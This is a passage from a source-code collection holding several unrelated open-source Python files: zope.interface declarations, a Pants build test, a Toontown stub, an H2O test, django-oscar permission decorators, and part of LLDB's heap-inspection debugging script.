if isinstance(provides, SpecificationBase):
return provides
try:
cls = ob.__class__
except AttributeError:
# We can't get the class, so just consider provides
return _empty
return implementedBy(cls)
getObjectSpecification = getObjectSpecificationFallback
def providedByFallback(ob):
# Here we have either a special object, an old-style declaration
# or a descriptor
# Try to get __providedBy__
try:
r = ob.__providedBy__
except AttributeError:
# Not set yet. Fall back to lower-level thing that computes it
return getObjectSpecification(ob)
try:
# We might have gotten a descriptor from an instance of a
# class (like an ExtensionClass) that doesn't support
# descriptors. We'll make sure we got one by trying to get
# the only attribute, which all specs have.
r.extends
except AttributeError:
# The object's class doesn't understand descriptors.
# Sigh. We need to get an object descriptor, but we have to be
# careful. We want to use the instance's __provides__, if
# there is one, but only if it didn't come from the class.
try:
r = ob.__provides__
except AttributeError:
# No __provides__, so just fall back to implementedBy
return implementedBy(ob.__class__)
# We need to make sure we got the __provides__ from the
# instance. We'll do this by making sure we don't get the same
# thing from the class:
try:
cp = ob.__class__.__provides__
except AttributeError:
# The ob doesn't have a class or the class has no
# provides, assume we're done:
return r
if r is cp:
# Oops, we got the provides from the class. This means
# the object doesn't have it's own. We should use implementedBy
return implementedBy(ob.__class__)
return r
providedBy = providedByFallback
class ObjectSpecificationDescriptorFallback(object):
"""Implement the `__providedBy__` attribute
The `__providedBy__` attribute computes the interfaces provided by
an object.
"""
def __get__(self, inst, cls):
"""Get an object specification for an object
"""
if inst is None:
return getObjectSpecification(cls)
provides = getattr(inst, '__provides__', None)
if provides is not None:
return provides
return implementedBy(cls)
ObjectSpecificationDescriptor = ObjectSpecificationDescriptorFallback
##############################################################################
def _normalizeargs(sequence, output = None):
"""Normalize declaration arguments
Arguments to normalize might contain Declarations, tuples, or single
interfaces.
Anything but individual interfaces or implements specs will be expanded.
"""
if output is None:
output = []
cls = sequence.__class__
if InterfaceClass in cls.__mro__ or Implements in cls.__mro__:
output.append(sequence)
else:
for v in sequence:
_normalizeargs(v, output)
return output
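# Example of the normalization above (IFoo, IBar, IBaz are hypothetical):
# _normalizeargs((IFoo, (IBar, Declaration(IBaz)))) recursively flattens the
# nested tuple and Declaration into [IFoo, IBar, IBaz], while bare interfaces
# and Implements specs are appended unchanged.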
_empty = Declaration()
try:
from ._zope_interface_coptimizations import (
getObjectSpecification,
implementedBy,
ObjectSpecificationDescriptor,
providedBy,
)
except ImportError:
pass
objectSpecificationDescriptor = ObjectSpecificationDescriptor()
| smmribeiro/intellij-community | plugins/hg4idea/testData/bin/mercurial/thirdparty/zope/interface/declarations.py | Python | apache-2.0 | 30,880 |
# coding=utf-8
# Copyright 2016 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import os
from textwrap import dedent
from pants.backend.python.tasks2.gather_sources import GatherSources
from pants.backend.python.tasks2.python_binary_create import PythonBinaryCreate
from pants.backend.python.tasks2.select_interpreter import SelectInterpreter
from pants.base.run_info import RunInfo
from pants_test.backend.python.tasks.python_task_test_base import PythonTaskTestBase
class PythonBinaryCreateTest(PythonTaskTestBase):
@classmethod
def task_type(cls):
return PythonBinaryCreate
def setUp(self):
super(PythonBinaryCreateTest, self).setUp()
self.library = self.create_python_library('src/python/lib', 'lib', {'lib.py': dedent("""
import os
def main():
os.getcwd()
""")})
self.binary = self.create_python_binary('src/python/bin', 'bin', 'lib.lib:main',
dependencies=['//src/python/lib'])
# The easiest way to create products required by the PythonBinaryCreate task is to
# execute the relevant tasks.
si_task_type = self.synthesize_task_subtype(SelectInterpreter, 'si_scope')
gs_task_type = self.synthesize_task_subtype(GatherSources, 'gs_scope')
self.task_context = self.context(for_task_types=[si_task_type, gs_task_type],
target_roots=[self.binary])
self.run_info_dir = os.path.join(self.pants_workdir, self.options_scope, 'test/info')
self.task_context.run_tracker.run_info = RunInfo(self.run_info_dir)
si_task_type(self.task_context, os.path.join(self.pants_workdir, 'si')).execute()
gs_task_type(self.task_context, os.path.join(self.pants_workdir, 'gs')).execute()
self.test_task = self.create_task(self.task_context)
self.dist_root = os.path.join(self.build_root, 'dist')
def _check_products(self, bin_name):
pex_name = '{}.pex'.format(bin_name)
products = self.task_context.products.get('deployable_archives')
self.assertIsNotNone(products)
product_data = products.get(self.binary)
product_basedir = product_data.keys()[0]
self.assertEquals(product_data[product_basedir], [pex_name])
# Check pex copy.
pex_copy = os.path.join(self.dist_root, pex_name)
self.assertTrue(os.path.isfile(pex_copy))
def test_deployable_archive_products(self):
self.test_task.execute()
self._check_products('bin')
| 15Dkatz/pants | tests/python/pants_test/backend/python/tasks2/test_python_binary_create.py | Python | apache-2.0 | 2,644 |
from direct.directnotify import DirectNotifyGlobal
from direct.distributed.DistributedObjectAI import DistributedObjectAI
class DistCogdoCraneMoneyBagAI(DistributedObjectAI):
notify = DirectNotifyGlobal.directNotify.newCategory("DistCogdoCraneMoneyBagAI")
def setIndex(self, todo0):
pass
def requestInitial(self):
pass
| silly-wacky-3-town-toon/SOURCE-COD | toontown/cogdominium/DistCogdoCraneMoneyBagAI.py | Python | apache-2.0 | 351 |
import os, sys
sys.path.insert(1, "../../../")
import h2o, tests
def deeplearning_multi():
print("Test checks if Deep Learning works fine with a multiclass training and test dataset")
prostate = h2o.import_file(h2o.locate("smalldata/logreg/prostate.csv"))
prostate[4] = prostate[4].asfactor()
hh = h2o.deeplearning(x = prostate[0:2],
y = prostate[4],
validation_x = prostate[0:2],
validation_y = prostate[4],
loss = 'CrossEntropy')
hh.show()
if __name__ == '__main__':
tests.run_test(sys.argv, deeplearning_multi)
| brightchen/h2o-3 | h2o-py/tests/testdir_algos/deeplearning/pyunit_multiclassDeepLearning.py | Python | apache-2.0 | 688 |
from functools import wraps
from django.contrib import messages
from django.contrib.auth import REDIRECT_FIELD_NAME
from django.contrib.auth.decorators import user_passes_test
from django.contrib.auth.views import redirect_to_login
from django.core.exceptions import PermissionDenied
from django.core.urlresolvers import reverse_lazy
from django.shortcuts import render
from django.utils.six.moves.urllib import parse
from django.utils.translation import ugettext_lazy as _
from oscar.core.compat import user_is_authenticated
def staff_member_required(view_func, login_url=None):
"""
Ensure that the user is a logged-in staff member.
* If not authenticated, redirect to a specified login URL.
* If not staff, show a 403 page
This decorator is based on the decorator with the same name from
django.contrib.admin.views.decorators. This one is superior as it allows a
redirect URL to be specified.
"""
if login_url is None:
login_url = reverse_lazy('customer:login')
@wraps(view_func)
def _checklogin(request, *args, **kwargs):
if request.user.is_active and request.user.is_staff:
return view_func(request, *args, **kwargs)
# If user is not logged in, redirect to login page
if not user_is_authenticated(request.user):
# If the login url is the same scheme and net location then just
# use the path as the "next" url.
path = request.build_absolute_uri()
login_scheme, login_netloc = parse.urlparse(login_url)[:2]
current_scheme, current_netloc = parse.urlparse(path)[:2]
if ((not login_scheme or login_scheme == current_scheme) and
(not login_netloc or login_netloc == current_netloc)):
path = request.get_full_path()
messages.warning(request, _("You must log in to access this page"))
return redirect_to_login(path, login_url, REDIRECT_FIELD_NAME)
else:
# User does not have permission to view this page
raise PermissionDenied
return _checklogin
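# Usage sketch (added; the view name and URL pattern are assumptions, not taken
# from Oscar itself): the decorator is typically applied when wiring dashboard
# views into a urls.py.
#
#   from django.conf.urls import url
#   from oscar.views.decorators import staff_member_required
#
#   urlpatterns = [
#       url(r'^dashboard/reports/$',
#           staff_member_required(ReportListView.as_view()),
#           name='reports-list'),
#   ]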
def check_permissions(user, permissions):
"""
Permissions can be a list or a tuple of lists. If it is a tuple,
every permission list will be evaluated and the outcome will be checked
for truthiness.
Each item of the list(s) must be either a valid Django permission name
(model.codename) or a property or method on the User model
(e.g. 'is_active', 'is_superuser').
Example usage:
- permissions_required(['is_staff', ])
would replace staff_member_required
- permissions_required(['is_anonymous', ])
would replace login_forbidden
- permissions_required((['is_staff',], ['partner.dashboard_access']))
allows both staff users and users with the above permission
"""
def _check_one_permission_list(perms):
regular_permissions = [perm for perm in perms if '.' in perm]
conditions = [perm for perm in perms if '.' not in perm]
# always check for is_active if not checking for is_anonymous
if (conditions and
'is_anonymous' not in conditions and
'is_active' not in conditions):
conditions.append('is_active')
attributes = [getattr(user, perm) for perm in conditions]
# evaluates methods, explicitly casts properties to booleans
passes_conditions = all([
attr() if callable(attr) else bool(attr) for attr in attributes])
return passes_conditions and user.has_perms(regular_permissions)
if not permissions:
return True
elif isinstance(permissions, list):
return _check_one_permission_list(permissions)
else:
return any(_check_one_permission_list(perm) for perm in permissions)
def permissions_required(permissions, login_url=None):
"""
Decorator that checks if a user has the given permissions.
Accepts a list or tuple of lists of permissions (see check_permissions
documentation).
If the user is not logged in and the test fails, she is redirected to a
login page. If the user is logged in, she gets a HTTP 403 Permission Denied
message, analogous to Django's permission_required decorator.
"""
if login_url is None:
login_url = reverse_lazy('customer:login')
def _check_permissions(user):
outcome = check_permissions(user, permissions)
if not outcome and user_is_authenticated(user):
raise PermissionDenied
else:
return outcome
return user_passes_test(_check_permissions, login_url=login_url)
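# Usage sketch (added; the view function is hypothetical): allowing either staff
# users or users holding a partner dashboard permission, mirroring the tuple
# form described in check_permissions above.
#
#   @permissions_required((['is_staff'], ['partner.dashboard_access']))
#   def dashboard_view(request):
#       ...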
def login_forbidden(view_func, template_name='login_forbidden.html',
status=403):
"""
Only allow anonymous users to access this view.
"""
@wraps(view_func)
def _checklogin(request, *args, **kwargs):
if not user_is_authenticated(request.user):
return view_func(request, *args, **kwargs)
return render(request, template_name, status=status)
return _checklogin
| sonofatailor/django-oscar | src/oscar/views/decorators.py | Python | bsd-3-clause | 5,064 |
#!/usr/bin/python
#----------------------------------------------------------------------
# This module is designed to live inside the "lldb" python package
# in the "lldb.macosx" package. To use this in the embedded python
# interpreter using "lldb" just import it:
#
# (lldb) script import lldb.macosx.heap
#----------------------------------------------------------------------
from __future__ import print_function
import lldb
import optparse
import os
import os.path
import re
import shlex
import string
import sys
import tempfile
import lldb.utils.symbolication
g_libheap_dylib_dir = None
g_libheap_dylib_dict = dict()
def get_iterate_memory_expr(
options,
process,
user_init_code,
user_return_code):
expr = '''
typedef unsigned natural_t;
typedef uintptr_t vm_size_t;
typedef uintptr_t vm_address_t;
typedef natural_t task_t;
typedef int kern_return_t;
#define KERN_SUCCESS 0
typedef void (*range_callback_t)(task_t task, void *baton, unsigned type, uintptr_t ptr_addr, uintptr_t ptr_size);
'''
if options.search_vm_regions:
expr += '''
typedef int vm_prot_t;
typedef unsigned int vm_inherit_t;
typedef unsigned long long memory_object_offset_t;
typedef unsigned int boolean_t;
typedef int vm_behavior_t;
typedef uint32_t vm32_object_id_t;
typedef natural_t mach_msg_type_number_t;
typedef uint64_t mach_vm_address_t;
typedef uint64_t mach_vm_offset_t;
typedef uint64_t mach_vm_size_t;
typedef uint64_t vm_map_offset_t;
typedef uint64_t vm_map_address_t;
typedef uint64_t vm_map_size_t;
#define VM_PROT_NONE ((vm_prot_t) 0x00)
#define VM_PROT_READ ((vm_prot_t) 0x01)
#define VM_PROT_WRITE ((vm_prot_t) 0x02)
#define VM_PROT_EXECUTE ((vm_prot_t) 0x04)
typedef struct vm_region_submap_short_info_data_64_t {
vm_prot_t protection;
vm_prot_t max_protection;
vm_inherit_t inheritance;
memory_object_offset_t offset; // offset into object/map
unsigned int user_tag; // user tag on map entry
unsigned int ref_count; // obj/map mappers, etc
unsigned short shadow_depth; // only for obj
unsigned char external_pager; // only for obj
unsigned char share_mode; // see enumeration
boolean_t is_submap; // submap vs obj
vm_behavior_t behavior; // access behavior hint
vm32_object_id_t object_id; // obj/map name, not a handle
unsigned short user_wired_count;
} vm_region_submap_short_info_data_64_t;
#define VM_REGION_SUBMAP_SHORT_INFO_COUNT_64 ((mach_msg_type_number_t)(sizeof(vm_region_submap_short_info_data_64_t)/sizeof(int)))'''
if user_init_code:
expr += user_init_code
expr += '''
task_t task = (task_t)mach_task_self();
mach_vm_address_t vm_region_base_addr;
mach_vm_size_t vm_region_size;
natural_t vm_region_depth;
vm_region_submap_short_info_data_64_t vm_region_info;
kern_return_t err;
for (vm_region_base_addr = 0, vm_region_size = 1; vm_region_size != 0; vm_region_base_addr += vm_region_size)
{
mach_msg_type_number_t vm_region_info_size = VM_REGION_SUBMAP_SHORT_INFO_COUNT_64;
err = (kern_return_t)mach_vm_region_recurse (task,
&vm_region_base_addr,
&vm_region_size,
&vm_region_depth,
&vm_region_info,
&vm_region_info_size);
if (err)
break;
// Check all read + write regions. This will cover the thread stacks
// and any regions of memory like __DATA segments, that might contain
// data we are looking for
if (vm_region_info.protection & VM_PROT_WRITE &&
vm_region_info.protection & VM_PROT_READ)
{
baton.callback (task,
&baton,
64,
vm_region_base_addr,
vm_region_size);
}
}'''
else:
if options.search_stack:
expr += get_thread_stack_ranges_struct(process)
if options.search_segments:
expr += get_sections_ranges_struct(process)
if user_init_code:
expr += user_init_code
if options.search_heap:
expr += '''
#define MALLOC_PTR_IN_USE_RANGE_TYPE 1
typedef struct vm_range_t {
vm_address_t address;
vm_size_t size;
} vm_range_t;
typedef kern_return_t (*memory_reader_t)(task_t task, vm_address_t remote_address, vm_size_t size, void **local_memory);
typedef void (*vm_range_recorder_t)(task_t task, void *baton, unsigned type, vm_range_t *range, unsigned size);
typedef struct malloc_introspection_t {
kern_return_t (*enumerator)(task_t task, void *, unsigned type_mask, vm_address_t zone_address, memory_reader_t reader, vm_range_recorder_t recorder); /* enumerates all the malloc pointers in use */
} malloc_introspection_t;
typedef struct malloc_zone_t {
void *reserved1[12];
struct malloc_introspection_t *introspect;
} malloc_zone_t;
memory_reader_t task_peek = [](task_t task, vm_address_t remote_address, vm_size_t size, void **local_memory) -> kern_return_t {
*local_memory = (void*) remote_address;
return KERN_SUCCESS;
};
vm_address_t *zones = 0;
unsigned int num_zones = 0;
task_t task = 0;
kern_return_t err = (kern_return_t)malloc_get_all_zones (task, task_peek, &zones, &num_zones);
if (KERN_SUCCESS == err)
{
for (unsigned int i=0; i<num_zones; ++i)
{
const malloc_zone_t *zone = (const malloc_zone_t *)zones[i];
if (zone && zone->introspect)
zone->introspect->enumerator (task,
&baton,
MALLOC_PTR_IN_USE_RANGE_TYPE,
(vm_address_t)zone,
task_peek,
[] (task_t task, void *baton, unsigned type, vm_range_t *ranges, unsigned size) -> void
{
range_callback_t callback = ((callback_baton_t *)baton)->callback;
for (unsigned i=0; i<size; ++i)
{
callback (task, baton, type, ranges[i].address, ranges[i].size);
}
});
}
}'''
if options.search_stack:
expr += '''
#ifdef NUM_STACKS
// Call the callback for the thread stack ranges
for (uint32_t i=0; i<NUM_STACKS; ++i) {
range_callback(task, &baton, 8, stacks[i].base, stacks[i].size);
if (STACK_RED_ZONE_SIZE > 0) {
range_callback(task, &baton, 16, stacks[i].base - STACK_RED_ZONE_SIZE, STACK_RED_ZONE_SIZE);
}
}
#endif'''
if options.search_segments:
expr += '''
#ifdef NUM_SEGMENTS
// Call the callback for all segments
for (uint32_t i=0; i<NUM_SEGMENTS; ++i)
range_callback(task, &baton, 32, segments[i].base, segments[i].size);
#endif'''
if user_return_code:
expr += "\n%s" % (user_return_code,)
return expr
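# Note (added): the C expression assembled above refers to names it does not
# define itself -- a callback_baton_t struct instance called "baton" whose
# "callback" member is a range_callback_t, and a "range_callback" function used
# by the stack/segment branches. Those are expected to be supplied through the
# caller's user_init_code (an assumption based on how the names are used here).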
def get_member_types_for_offset(value_type, offset, member_list):
member = value_type.GetFieldAtIndex(0)
search_bases = False
if member:
if member.GetOffsetInBytes() <= offset:
for field_idx in range(value_type.GetNumberOfFields()):
member = value_type.GetFieldAtIndex(field_idx)
member_byte_offset = member.GetOffsetInBytes()
member_end_byte_offset = member_byte_offset + member.type.size
if member_byte_offset <= offset and offset < member_end_byte_offset:
member_list.append(member)
get_member_types_for_offset(
member.type, offset - member_byte_offset, member_list)
return
else:
search_bases = True
else:
search_bases = True
if search_bases:
for field_idx in range(value_type.GetNumberOfDirectBaseClasses()):
member = value_type.GetDirectBaseClassAtIndex(field_idx)
member_byte_offset = member.GetOffsetInBytes()
member_end_byte_offset = member_byte_offset + member.type.size
if member_byte_offset <= offset and offset < member_end_byte_offset:
member_list.append(member)
get_member_types_for_offset(
member.type, offset - member_byte_offset, member_list)
return
for field_idx in range(value_type.GetNumberOfVirtualBaseClasses()):
member = value_type.GetVirtualBaseClassAtIndex(field_idx)
member_byte_offset = member.GetOffsetInBytes()
member_end_byte_offset = member_byte_offset + member.type.size
if member_byte_offset <= offset and offset < member_end_byte_offset:
member_list.append(member)
get_member_types_for_offset(
member.type, offset - member_byte_offset, member_list)
return
def append_regex_callback(option, opt, value, parser):
try:
ivar_regex = re.compile(value)
parser.values.ivar_regex_blacklist.append(ivar_regex)
except:
print('error: an exception was thrown when compiling the ivar regular expression for "%s"' % value)
def add_common_options(parser):
parser.add_option(
'-v',
'--verbose',
action='store_true',
dest='verbose',
help='display verbose debug info',
default=False)
parser.add_option(
'-t',
'--type',
action='store_true',
dest='print_type',
help='print the full value of the type for each matching malloc block',
default=False)
parser.add_option(
'-o',
'--po',
action='store_true',
dest='print_object_description',
help='print the object descriptions for any matches',
default=False)
parser.add_option(
'-z',
'--size',
action='store_true',
dest='show_size',
help='print the allocation size in bytes',
default=False)
parser.add_option(
'-r',
'--range',
action='store_true',
dest='show_range',
help='print the allocation address range instead of just the allocation base address',
default=False)
parser.add_option(
'-m',
'--memory',
action='store_true',
dest='memory',
help='dump the memory for each matching block',
default=False)
parser.add_option(
'-f',
'--format',
type='string',
dest='format',
help='the format to use when dumping memory if --memory is specified',
default=None)
parser.add_option(
'-I',
'--omit-ivar-regex',
type='string',
action='callback',
callback=append_regex_callback,
dest='ivar_regex_blacklist',
default=[],
help='specify one or more regular expressions used to blacklist any matches that are in ivars')
parser.add_option(
'-s',
'--stack',
action='store_true',
dest='stack',
help='gets the stack that allocated each malloc block if MallocStackLogging is enabled',
default=False)
parser.add_option(
'-S',
'--stack-history',
action='store_true',
dest='stack_history',
help='gets the stack history for all allocations whose start address matches each malloc block if MallocStackLogging is enabled',
default=False)
parser.add_option(
'-F',
'--max-frames',
type='int',
dest='max_frames',
help='the maximum number of stack frames to print when using the --stack or --stack-history options (default=128)',
default=128)
parser.add_option(
'-H',
'--max-history',
type='int',
dest='max_history',
help='the maximum number of stack history backtraces to print for each allocation when using the --stack-history option (default=16)',
default=16)
parser.add_option(
'-M',
'--max-matches',
type='int',
dest='max_matches',
help='the maximum number of matches to print',
default=32)
parser.add_option(
'-O',
'--offset',
type='int',
dest='offset',
help='the matching data must be at this offset',
default=-1)
parser.add_option(
'--ignore-stack',
action='store_false',
dest='search_stack',
help="Don't search the stack when enumerating memory",
default=True)
parser.add_option(
'--ignore-heap',
action='store_false',
dest='search_heap',
help="Don't search the heap allocations when enumerating memory",
default=True)
parser.add_option(
'--ignore-segments',
action='store_false',
dest='search_segments',
help="Don't search readable executable segments enumerating memory",
default=True)
parser.add_option(
'-V',
'--vm-regions',
action='store_true',
dest='search_vm_regions',
help='Check all VM regions instead of searching the heap, stack and segments',
default=False)
def type_flags_to_string(type_flags):
if type_flags == 0:
type_str = 'free'
elif type_flags & 2:
type_str = 'malloc'
elif type_flags & 4:
type_str = 'free'
elif type_flags & 1:
type_str = 'generic'
elif type_flags & 8:
type_str = 'stack'
elif type_flags & 16:
type_str = 'stack (red zone)'
elif type_flags & 32:
type_str = 'segment'
elif type_flags & 64:
type_str = 'vm_region'
else:
type_str = hex(type_flags)
return type_str
def find_variable_containing_address(verbose, frame, match_addr):
variables = frame.GetVariables(True, True, True, True)
matching_var = None
for var in variables:
var_addr = var.GetLoadAddress()
if var_addr != lldb.LLDB_INVALID_ADDRESS:
byte_size = var.GetType().GetByteSize()
if verbose:
print('frame #%u: [%#x - %#x) %s' % (frame.GetFrameID(), var.load_addr, var.load_addr + byte_size, var.name))
if var_addr == match_addr:
if verbose:
print('match')
return var
else:
if byte_size > 0 and var_addr <= match_addr and match_addr < (
var_addr + byte_size):
if verbose:
print('match')
return var
return None
def find_frame_for_stack_address(process, addr):
closest_delta = sys.maxsize
closest_frame = None
# print 'find_frame_for_stack_address(%#x)' % (addr)
for thread in process:
prev_sp = lldb.LLDB_INVALID_ADDRESS
for frame in thread:
cfa = frame.GetCFA()
# print 'frame #%u: cfa = %#x' % (frame.GetFrameID(), cfa)
if addr < cfa:
delta = cfa - addr
# print '%#x < %#x, delta = %i' % (addr, cfa, delta)
if delta < closest_delta:
# print 'closest'
closest_delta = delta
closest_frame = frame
# else:
# print 'delta >= closest_delta'
return closest_frame
def type_flags_to_description(
process,
type_flags,
ptr_addr,
ptr_size,
offset,
match_addr):
show_offset = False
if type_flags == 0 or type_flags & 4:
type_str = 'free(%#x)' % (ptr_addr,)
elif type_flags & 2 or type_flags & 1:
type_str = 'malloc(%6u) -> %#x' % (ptr_size, ptr_addr)
show_offset = True
elif type_flags & 8:
type_str = 'stack'
frame = find_frame_for_stack_address(process, match_addr)
if frame:
type_str += ' in frame #%u of thread #%u: tid %#x' % (frame.GetFrameID(
), frame.GetThread().GetIndexID(), frame.GetThread().GetThreadID())
variables = frame.GetVariables(True, True, True, True)
matching_var = None
for var in variables:
var_addr = var.GetLoadAddress()
if var_addr != lldb.LLDB_INVALID_ADDRESS:
# print 'variable "%s" @ %#x (%#x)' % (var.name, var.load_addr,
# match_addr)
if var_addr == match_addr:
matching_var = var
break
else:
byte_size = var.GetType().GetByteSize()
if byte_size > 0 and var_addr <= match_addr and match_addr < (
var_addr + byte_size):
matching_var = var
break
if matching_var:
type_str += ' in variable at %#x:\n %s' % (
matching_var.GetLoadAddress(), matching_var)
elif type_flags & 16:
type_str = 'stack (red zone)'
elif type_flags & 32:
sb_addr = process.GetTarget().ResolveLoadAddress(ptr_addr + offset)
type_str = 'segment [%#x - %#x), %s + %u, %s' % (
ptr_addr, ptr_addr + ptr_size, sb_addr.section.name, sb_addr.offset, sb_addr)
elif type_flags & 64:
sb_addr = process.GetTarget().ResolveLoadAddress(ptr_addr + offset)
type_str = 'vm_region [%#x - %#x), %s + %u, %s' % (
ptr_addr, ptr_addr + ptr_size, sb_addr.section.name, sb_addr.offset, sb_addr)
else:
type_str = '%#x' % (ptr_addr,)
show_offset = True
if show_offset and offset != 0:
type_str += ' + %-6u' % (offset,)
return type_str
def dump_stack_history_entry(options, result, stack_history_entry, idx):
address = int(stack_history_entry.address)
if address:
type_flags = int(stack_history_entry.type_flags)
symbolicator = lldb.utils.symbolication.Symbolicator()
symbolicator.target = lldb.debugger.GetSelectedTarget()
type_str = type_flags_to_string(type_flags)
result.AppendMessage(
'stack[%u]: addr = 0x%x, type=%s, frames:' %
(idx, address, type_str))
frame_idx = 0
idx = 0
pc = int(stack_history_entry.frames[idx])
while pc != 0:
if pc >= 0x1000:
frames = symbolicator.symbolicate(pc)
if frames:
for frame in frames:
result.AppendMessage(
' [%u] %s' %
(frame_idx, frame))
frame_idx += 1
else:
result.AppendMessage(' [%u] 0x%x' % (frame_idx, pc))
frame_idx += 1
idx = idx + 1
pc = int(stack_history_entry.frames[idx])
else:
pc = 0
if idx >= options.max_frames:
result.AppendMessage(
'warning: the max number of stack frames (%u) was reached, use the "--max-frames=<COUNT>" option to see more frames' %
(options.max_frames))
result.AppendMessage('')
def dump_stack_history_entries(options, result, addr, history):
# malloc_stack_entry *get_stack_history_for_address (const void * addr)
expr_prefix = '''
typedef int kern_return_t;
typedef struct $malloc_stack_entry {
uint64_t address;
uint64_t argument;
uint32_t type_flags;
uint32_t num_frames;
uint64_t frames[512];
kern_return_t err;
} $malloc_stack_entry;
'''
single_expr = '''
#define MAX_FRAMES %u
typedef unsigned task_t;
$malloc_stack_entry stack;
stack.address = 0x%x;
stack.type_flags = 2;
stack.num_frames = 0;
stack.frames[0] = 0;
uint32_t max_stack_frames = MAX_FRAMES;
stack.err = (kern_return_t)__mach_stack_logging_get_frames (
(task_t)mach_task_self(),
stack.address,
&stack.frames[0],
max_stack_frames,
&stack.num_frames);
if (stack.num_frames < MAX_FRAMES)
stack.frames[stack.num_frames] = 0;
else
stack.frames[MAX_FRAMES-1] = 0;
stack''' % (options.max_frames, addr)
history_expr = '''
typedef int kern_return_t;
typedef unsigned task_t;
#define MAX_FRAMES %u
#define MAX_HISTORY %u
typedef struct mach_stack_logging_record_t {
uint32_t type_flags;
uint64_t stack_identifier;
uint64_t argument;
uint64_t address;
} mach_stack_logging_record_t;
typedef void (*enumerate_callback_t)(mach_stack_logging_record_t, void *);
typedef struct malloc_stack_entry {
uint64_t address;
uint64_t argument;
uint32_t type_flags;
uint32_t num_frames;
uint64_t frames[MAX_FRAMES];
kern_return_t frames_err;
} malloc_stack_entry;
typedef struct $malloc_stack_history {
task_t task;
unsigned idx;
malloc_stack_entry entries[MAX_HISTORY];
} $malloc_stack_history;
$malloc_stack_history lldb_info = { (task_t)mach_task_self(), 0 };
uint32_t max_stack_frames = MAX_FRAMES;
enumerate_callback_t callback = [] (mach_stack_logging_record_t stack_record, void *baton) -> void {
$malloc_stack_history *lldb_info = ($malloc_stack_history *)baton;
if (lldb_info->idx < MAX_HISTORY) {
malloc_stack_entry *stack_entry = &(lldb_info->entries[lldb_info->idx]);
stack_entry->address = stack_record.address;
stack_entry->type_flags = stack_record.type_flags;
stack_entry->argument = stack_record.argument;
stack_entry->num_frames = 0;
stack_entry->frames[0] = 0;
stack_entry->frames_err = (kern_return_t)__mach_stack_logging_frames_for_uniqued_stack (
lldb_info->task,
stack_record.stack_identifier,
stack_entry->frames,
(uint32_t)MAX_FRAMES,
&stack_entry->num_frames);
// Terminate the frames with zero if there is room
if (stack_entry->num_frames < MAX_FRAMES)
stack_entry->frames[stack_entry->num_frames] = 0;
}
++lldb_info->idx;
};
(kern_return_t)__mach_stack_logging_enumerate_records (lldb_info.task, (uint64_t)0x%x, callback, &lldb_info);
lldb_info''' % (options.max_frames, options.max_history, addr)
frame = lldb.debugger.GetSelectedTarget().GetProcess(
).GetSelectedThread().GetSelectedFrame()
if history:
expr = history_expr
else:
expr = single_expr
expr_options = lldb.SBExpressionOptions()
expr_options.SetIgnoreBreakpoints(True)
expr_options.SetTimeoutInMicroSeconds(5 * 1000 * 1000) # 5 second timeout
expr_options.SetTryAllThreads(True)
expr_options.SetLanguage(lldb.eLanguageTypeObjC_plus_plus)
expr_options.SetPrefix(expr_prefix)
expr_sbvalue = frame.EvaluateExpression(expr, expr_options)
if options.verbose:
print("expression:")
print(expr)
print("expression result:")
print(expr_sbvalue)
if expr_sbvalue.error.Success():
if history:
malloc_stack_history = lldb.value(expr_sbvalue)
num_stacks = int(malloc_stack_history.idx)
if num_stacks <= options.max_history:
i_max = num_stacks
else:
i_max = options.max_history
for i in range(i_max):
stack_history_entry = malloc_stack_history.entries[i]
dump_stack_history_entry(
options, result, stack_history_entry, i)
if num_stacks > options.max_history:
result.AppendMessage(
'warning: the max number of stacks (%u) was reached, use the "--max-history=%u" option to see all of the stacks' %
(options.max_history, num_stacks))
else:
stack_history_entry = lldb.value(expr_sbvalue)
dump_stack_history_entry(options, result, stack_history_entry, 0)
else:
result.AppendMessage(
'error: expression failed "%s" => %s' %
(expr, expr_sbvalue.error))
def display_match_results(
process,
result,
options,
arg_str_description,
expr,
print_no_matches,
expr_prefix=None):
frame = lldb.debugger.GetSelectedTarget().GetProcess(
).GetSelectedThread().GetSelectedFrame()
if not frame:
result.AppendMessage('error: invalid frame')
return 0
expr_options = lldb.SBExpressionOptions()
expr_options.SetIgnoreBreakpoints(True)
expr_options.SetFetchDynamicValue(lldb.eNoDynamicValues)
expr_options.SetTimeoutInMicroSeconds(
30 * 1000 * 1000) # 30 second timeout
expr_options.SetTryAllThreads(False)
expr_options.SetLanguage(lldb.eLanguageTypeObjC_plus_plus)
if expr_prefix:
expr_options.SetPrefix(expr_prefix)
expr_sbvalue = frame.EvaluateExpression(expr, expr_options)
if options.verbose:
print("expression:")
print(expr)
print("expression result:")
print(expr_sbvalue)
if expr_sbvalue.error.Success():
match_value = lldb.value(expr_sbvalue)
i = 0
match_idx = 0
while True:
print_entry = True
match_entry = match_value[i]
i += 1
if i > options.max_matches:
result.AppendMessage(
'warning: the max number of matches (%u) was reached, use the --max-matches option to get more results' %
(options.max_matches))
break
malloc_addr = match_entry.addr.sbvalue.unsigned
if malloc_addr == 0:
break
malloc_size = int(match_entry.size)
offset = int(match_entry.offset)
if options.offset >= 0 and options.offset != offset:
print_entry = False
else:
match_addr = malloc_addr + offset
type_flags = int(match_entry.type)
#result.AppendMessage (hex(malloc_addr + offset))
if type_flags == 64:
search_stack_old = options.search_stack
search_segments_old = options.search_segments
search_heap_old = options.search_heap
search_vm_regions = options.search_vm_regions
options.search_stack = True
options.search_segments = True
options.search_heap = True
options.search_vm_regions = False
if malloc_info_impl(lldb.debugger, result, options, [
hex(malloc_addr + offset)]):
print_entry = False
options.search_stack = search_stack_old
options.search_segments = search_segments_old
options.search_heap = search_heap_old
options.search_vm_regions = search_vm_regions
if print_entry:
description = '%#16.16x: %s' % (match_addr, type_flags_to_description(
process, type_flags, malloc_addr, malloc_size, offset, match_addr))
if options.show_size:
description += ' <%5u>' % (malloc_size)
if options.show_range:
description += ' [%#x - %#x)' % (
malloc_addr, malloc_addr + malloc_size)
derefed_dynamic_value = None
dynamic_value = match_entry.addr.sbvalue.GetDynamicValue(
lldb.eDynamicCanRunTarget)
if dynamic_value.type.name == 'void *':
if options.type == 'pointer' and malloc_size == 4096:
error = lldb.SBError()
process = expr_sbvalue.GetProcess()
target = expr_sbvalue.GetTarget()
data = bytearray(
process.ReadMemory(
malloc_addr, 16, error))
if data == b'\xa1\xa1\xa1\xa1AUTORELEASE!':
ptr_size = target.addr_size
thread = process.ReadUnsignedFromMemory(
malloc_addr + 16 + ptr_size, ptr_size, error)
